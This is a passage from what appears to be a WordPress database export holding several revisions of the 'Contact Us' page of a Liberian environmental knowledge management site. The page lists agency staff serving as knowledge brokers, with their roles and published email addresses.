href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\nManager\nDepartment of Marine Fisheries and Environment\nNaFAA\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-23 08:51:35','2021-03-23 08:51:35','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3589,42,'2021-03-23 08:51:36','2021-03-23 08:51:36','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\nManager\nDepartment of Marine Fisheries and Environment\nNaFAA\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-23 08:51:36','2021-03-23 08:51:36','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3590,42,'2021-03-23 08:51:36','2021-03-23 08:51:36','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/bgoll-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll</strong><br />Conservation Manager<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br 